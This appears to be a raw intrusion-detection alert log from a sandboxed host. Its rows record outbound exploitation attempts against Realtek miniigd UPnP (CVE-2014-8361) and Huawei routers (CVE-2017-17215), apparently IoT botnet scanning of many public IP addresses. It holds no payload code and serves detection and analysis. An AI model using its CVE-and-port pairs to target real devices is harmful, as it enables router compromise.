                                      07/20/24-23:01:50.212921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614372252869192.168.2.2318.71.115.72
                                      07/20/24-23:01:41.947663TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24586252869192.168.2.23145.93.255.182
                                      07/20/24-23:01:48.649139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5485452869192.168.2.23155.90.77.175
                                      07/20/24-23:01:42.608320TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25323052869192.168.2.23153.109.210.254
                                      07/20/24-23:01:42.745651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3606052869192.168.2.2347.244.160.188
                                      07/20/24-23:01:51.288562TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613870252869192.168.2.23209.27.18.74
                                      07/20/24-23:01:03.482119TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613578452869192.168.2.23103.18.195.93
                                      07/20/24-23:02:43.182629TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614505452869192.168.2.23124.204.221.162
                                      07/20/24-23:01:57.269160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5307052869192.168.2.23138.120.228.47
                                      07/20/24-23:01:08.572196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25043052869192.168.2.2354.250.134.170
                                      07/20/24-23:01:43.164529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032252869192.168.2.23192.101.61.62
                                      07/20/24-23:01:41.182584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5245452869192.168.2.23155.251.124.204
                                      07/20/24-23:01:43.197088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24193052869192.168.2.2377.119.24.21
                                      07/20/24-23:01:53.308763TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25386052869192.168.2.2381.50.220.234
                                      07/20/24-23:01:11.636599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677837215192.168.2.23157.169.172.215
                                      07/20/24-23:01:04.082385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881837215192.168.2.23197.246.208.103
                                      07/20/24-23:01:40.285038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621037215192.168.2.23197.29.110.76
                                      07/20/24-23:01:45.294002TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613717052869192.168.2.23190.13.238.183
                                      07/20/24-23:01:31.979565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583237215192.168.2.23157.183.175.156
                                      07/20/24-23:01:42.460493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4162452869192.168.2.2375.212.169.191
                                      07/20/24-23:01:11.639230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588637215192.168.2.234.154.54.81
                                      07/20/24-23:01:46.323644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5388252869192.168.2.2335.100.148.20
                                      07/20/24-23:01:44.749294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5602052869192.168.2.23180.183.76.230
                                      07/20/24-23:01:04.751333TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614932052869192.168.2.23154.97.74.140
                                      07/20/24-23:01:31.313382TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23978452869192.168.2.2339.181.226.152
                                      07/20/24-23:01:44.921789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5321652869192.168.2.2334.198.8.37
                                      07/20/24-23:01:04.985241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614407652869192.168.2.2327.181.35.71
                                      07/20/24-23:01:27.749737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484237215192.168.2.23166.117.175.116
                                      07/20/24-23:01:08.619598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3636852869192.168.2.2365.114.239.111
                                      07/20/24-23:01:31.976795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686637215192.168.2.23197.154.129.141
                                      07/20/24-23:01:08.594120TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23945452869192.168.2.23117.27.97.229
                                      07/20/24-23:01:40.334934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441237215192.168.2.23197.100.4.197
                                      07/20/24-23:01:06.988055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678037215192.168.2.23197.125.71.143
                                      07/20/24-23:01:42.769238TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23758452869192.168.2.23177.147.32.222
                                      07/20/24-23:01:43.810783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4963652869192.168.2.23192.175.188.159
                                      07/20/24-23:01:11.633481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311437215192.168.2.23197.132.172.129
                                      07/20/24-23:01:55.296002TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4159652869192.168.2.23194.210.88.179
                                      07/20/24-23:01:20.152427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416437215192.168.2.23197.173.190.17
                                      07/20/24-23:01:46.158533TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615466252869192.168.2.2381.48.180.48
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550237215192.168.2.2341.241.151.239
                                      07/20/24-23:01:08.630327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25521252869192.168.2.2386.74.227.91
                                      07/20/24-23:01:25.468217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615459852869192.168.2.2335.92.216.124
                                      07/20/24-23:01:59.234149TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614435452869192.168.2.2396.1.75.175
                                      07/20/24-23:01:14.097795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099237215192.168.2.2341.182.86.76
                                      07/20/24-23:01:01.371551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614325652869192.168.2.23206.208.92.27
                                      07/20/24-23:01:44.527952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694052869192.168.2.23163.49.61.251
                                      07/20/24-23:01:42.452119TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24100852869192.168.2.23130.186.238.85
                                      07/20/24-23:01:49.660516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3470852869192.168.2.23203.130.71.37
                                      07/20/24-23:01:44.368405TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615176252869192.168.2.23197.9.101.249
                                      07/20/24-23:01:47.990801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614011052869192.168.2.23129.221.8.145
                                      07/20/24-23:01:31.311969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4683052869192.168.2.23211.69.194.148
                                      07/20/24-23:01:42.650744TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615370252869192.168.2.23143.254.203.194
                                      07/20/24-23:01:07.004907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614437215192.168.2.2357.18.83.1
                                      07/20/24-23:01:41.276434TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614664852869192.168.2.23172.43.240.212
                                      07/20/24-23:01:41.347676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5251252869192.168.2.23153.109.210.254
                                      07/20/24-23:01:02.070492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730437215192.168.2.23111.12.203.144
                                      07/20/24-23:01:08.626717TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23463252869192.168.2.23124.254.84.115
                                      07/20/24-23:01:45.261796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614915852869192.168.2.23102.31.132.7
                                      07/20/24-23:01:42.115230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6069852869192.168.2.23137.127.2.156
                                      07/20/24-23:01:45.270636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24115452869192.168.2.23126.252.220.138
                                      07/20/24-23:01:47.253863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4965252869192.168.2.23130.112.45.111
                                      07/20/24-23:01:12.861753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24349852869192.168.2.23144.152.137.9
                                      07/20/24-23:01:45.119426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5230052869192.168.2.2361.251.112.155
                                      07/20/24-23:01:44.940207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4109252869192.168.2.23139.85.109.63
                                      07/20/24-23:01:45.202570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5354652869192.168.2.2388.161.89.160
                                      07/20/24-23:01:51.925038TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613686252869192.168.2.23191.56.81.141
                                      07/20/24-23:02:11.592030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5647252869192.168.2.23139.220.216.2
                                      07/20/24-23:01:02.773260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3856452869192.168.2.23205.29.56.156
                                      07/20/24-23:01:44.713195TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25564852869192.168.2.23136.252.196.177
                                      07/20/24-23:01:11.662969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107637215192.168.2.2341.217.4.188
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066637215192.168.2.23206.180.101.209
                                      07/20/24-23:01:00.636534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067437215192.168.2.23157.114.148.67
                                      07/20/24-23:01:54.310738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5121852869192.168.2.2365.202.231.124
                                      07/20/24-23:01:08.668802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26021252869192.168.2.23128.89.159.185
                                      07/20/24-23:01:32.034562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484037215192.168.2.2341.111.248.140
                                      07/20/24-23:01:44.926055TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23681652869192.168.2.23140.59.54.38
                                      07/20/24-23:01:04.049279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553437215192.168.2.23157.67.8.157
                                      07/20/24-23:01:58.460651TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23932452869192.168.2.23217.154.142.187
                                      07/20/24-23:01:08.574948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24683052869192.168.2.234.131.130.12
                                      07/20/24-23:01:42.151857TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5413652869192.168.2.23192.12.75.155
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442037215192.168.2.23157.90.253.17
                                      07/20/24-23:01:03.231165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863052869192.168.2.23216.151.5.50
                                      07/20/24-23:01:49.035612TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615954052869192.168.2.2372.136.42.217
                                      07/20/24-23:01:42.677933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24933052869192.168.2.2340.200.215.102
                                      07/20/24-23:01:20.161614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851837215192.168.2.2341.71.153.133
                                      07/20/24-23:01:14.207040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840837215192.168.2.23197.146.3.86
                                      07/20/24-23:01:20.157619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965237215192.168.2.23157.143.93.40
                                      07/20/24-23:02:00.868779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24366652869192.168.2.23158.218.4.185
                                      07/20/24-23:03:53.978924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3700452869192.168.2.2324.105.77.87
                                      07/20/24-23:01:32.032492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5194037215192.168.2.23197.101.2.117
                                      07/20/24-23:01:42.762943TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4596252869192.168.2.23145.71.96.96
                                      07/20/24-23:01:43.555540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25237852869192.168.2.23153.197.27.100
                                      07/20/24-23:01:24.934977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555437215192.168.2.23197.42.208.165
                                      07/20/24-23:01:51.197215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5249452869192.168.2.23120.23.234.48
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558437215192.168.2.23197.60.240.126
                                      07/20/24-23:01:49.921076TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614420052869192.168.2.2375.3.82.5
                                      07/20/24-23:01:42.486106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5612252869192.168.2.23149.227.25.96
                                      07/20/24-23:01:46.663212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4881252869192.168.2.23162.122.16.215
                                      07/20/24-23:01:45.261796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4741252869192.168.2.23162.239.164.172
                                      07/20/24-23:01:27.650643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544237215192.168.2.23157.62.33.47
                                      07/20/24-23:01:02.054387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371237215192.168.2.23176.251.98.66
                                      07/20/24-23:01:08.563416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23852852869192.168.2.23160.189.204.148
                                      07/20/24-23:01:44.311969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23377652869192.168.2.23192.101.61.62
                                      07/20/24-23:01:46.423677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3535052869192.168.2.2337.189.26.199
                                      07/20/24-23:01:46.384516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615489052869192.168.2.2314.96.36.55
                                      07/20/24-23:01:40.296076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871637215192.168.2.23157.129.21.167
                                      07/20/24-23:01:27.664887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723037215192.168.2.23197.157.81.10
                                      07/20/24-23:01:32.034562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067637215192.168.2.2374.90.46.163
                                      07/20/24-23:01:42.535137TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5609452869192.168.2.23171.216.201.201
                                      07/20/24-23:01:04.627153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613709452869192.168.2.23185.31.200.232
                                      07/20/24-23:01:08.560530TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25925652869192.168.2.2342.114.143.158
                                      07/20/24-23:01:13.314226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614046452869192.168.2.23221.64.55.120
                                      07/20/24-23:01:02.721182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616091252869192.168.2.23114.190.123.93
                                      07/20/24-23:02:04.052371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4087452869192.168.2.2313.96.238.187
                                      07/20/24-23:01:20.596563TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25272852869192.168.2.2320.24.147.17
                                      07/20/24-23:01:42.704266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4934052869192.168.2.23113.71.166.108
                                      07/20/24-23:01:44.020551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4553252869192.168.2.2358.172.86.110
                                      07/20/24-23:01:50.903844TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4062052869192.168.2.2342.169.174.111
                                      07/20/24-23:01:06.996056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935437215192.168.2.2361.122.127.136
                                      07/20/24-23:01:43.845332TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5055852869192.168.2.23109.104.48.215
                                      07/20/24-23:01:27.739158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297837215192.168.2.23157.195.217.147
                                      07/20/24-23:01:42.908066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4624852869192.168.2.23147.72.210.150
                                      07/20/24-23:01:44.968238TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25091652869192.168.2.23145.77.223.88
                                      07/20/24-23:01:42.612377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23853252869192.168.2.2385.109.146.148
                                      07/20/24-23:01:27.677519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030237215192.168.2.2392.112.157.125
                                      07/20/24-23:01:04.050503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228237215192.168.2.2341.149.9.235
                                      07/20/24-23:01:41.750477TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23715852869192.168.2.23113.184.252.189
                                      07/20/24-23:02:05.544188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614293652869192.168.2.23206.59.132.204
                                      07/20/24-23:01:08.590938TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23999052869192.168.2.23150.171.160.226
                                      07/20/24-23:01:04.014688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5896237215192.168.2.23197.34.158.231
                                      07/20/24-23:01:04.999060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4692852869192.168.2.2358.116.31.11
                                      07/20/24-23:01:06.973541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325237215192.168.2.23118.232.12.90
                                      07/20/24-23:01:41.218109TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613566852869192.168.2.23176.90.235.184
                                      07/20/24-23:01:20.113254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034037215192.168.2.2341.147.128.195
                                      07/20/24-23:01:41.987411TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23288652869192.168.2.2318.151.187.19
                                      07/20/24-23:01:46.004063TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24077852869192.168.2.23104.155.48.50
                                      07/20/24-23:01:02.079114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568037215192.168.2.23111.15.64.29
                                      07/20/24-23:01:04.085431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797837215192.168.2.23197.179.7.146
                                      07/20/24-23:01:20.161614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311237215192.168.2.2313.178.123.242
                                      07/20/24-23:01:54.375005TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615476652869192.168.2.23157.156.14.69
                                      07/20/24-23:01:20.124696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261637215192.168.2.23197.124.243.228
                                      07/20/24-23:02:42.973189TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614125052869192.168.2.2390.6.68.219
                                      07/20/24-23:01:55.262010TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24052252869192.168.2.23105.145.121.113
                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609637215192.168.2.2317.145.238.56
                                      07/20/24-23:01:04.605795TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613502452869192.168.2.23155.161.137.123
                                      07/20/24-23:01:13.596807TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3609252869192.168.2.2332.75.241.221
                                      07/20/24-23:01:20.124696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041637215192.168.2.2341.50.141.98
                                      07/20/24-23:01:31.975107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383237215192.168.2.23197.180.219.211
                                      07/20/24-23:01:27.649885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431037215192.168.2.2341.51.57.163
                                      07/20/24-23:01:43.164529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3591052869192.168.2.2385.91.68.35
                                      07/20/24-23:01:45.074222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24543652869192.168.2.2324.42.93.65
                                      07/20/24-23:02:20.472956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5614052869192.168.2.2314.149.133.62
                                      07/20/24-23:01:08.565610TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5246052869192.168.2.23106.250.20.58
                                      07/20/24-23:02:06.738802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4261852869192.168.2.2332.132.194.251
                                      07/20/24-23:01:32.073087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226437215192.168.2.23197.100.156.74
                                      07/20/24-23:00:57.221141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290637215192.168.2.23157.119.223.145
                                      07/20/24-23:01:34.046616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282237215192.168.2.2341.197.119.215
                                      07/20/24-23:01:01.758577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5721052869192.168.2.23135.9.168.169
                                      07/20/24-23:02:00.328412TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24010052869192.168.2.23164.237.7.212
                                      07/20/24-23:01:07.066373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4196237215192.168.2.23157.115.234.122
                                      07/20/24-23:01:31.976984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790637215192.168.2.2341.239.105.156
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001037215192.168.2.23170.47.187.157
                                      07/20/24-23:01:53.357099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5659652869192.168.2.23161.100.49.199
                                      07/20/24-23:01:40.307219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601637215192.168.2.23193.159.96.215
                                      07/20/24-23:01:44.484128TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613878452869192.168.2.2339.212.80.61
                                      07/20/24-23:01:42.619336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3401852869192.168.2.2342.202.134.116
                                      07/20/24-23:01:34.045144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058637215192.168.2.23197.218.45.39
                                      07/20/24-23:01:01.510385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614428252869192.168.2.2336.193.87.124
                                      07/20/24-23:01:01.752804TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613980052869192.168.2.23172.95.79.32
                                      07/20/24-23:01:42.809715TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5796452869192.168.2.23218.79.146.2
                                      07/20/24-23:01:08.556804TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3430652869192.168.2.23205.32.150.55
                                      07/20/24-23:01:02.048214TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5083452869192.168.2.23194.63.61.192
                                      07/20/24-23:01:21.909111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712837215192.168.2.2341.119.255.118
                                      07/20/24-23:01:01.516827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5737052869192.168.2.2370.59.242.166
                                      07/20/24-23:01:57.690792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4813252869192.168.2.23119.129.124.77
                                      07/20/24-23:01:44.756265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5917052869192.168.2.23156.254.5.127
                                      07/20/24-23:01:49.011895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5283252869192.168.2.23144.14.202.149
                                      07/20/24-23:01:41.380677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4678052869192.168.2.23191.177.238.243
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653837215192.168.2.23157.54.52.255
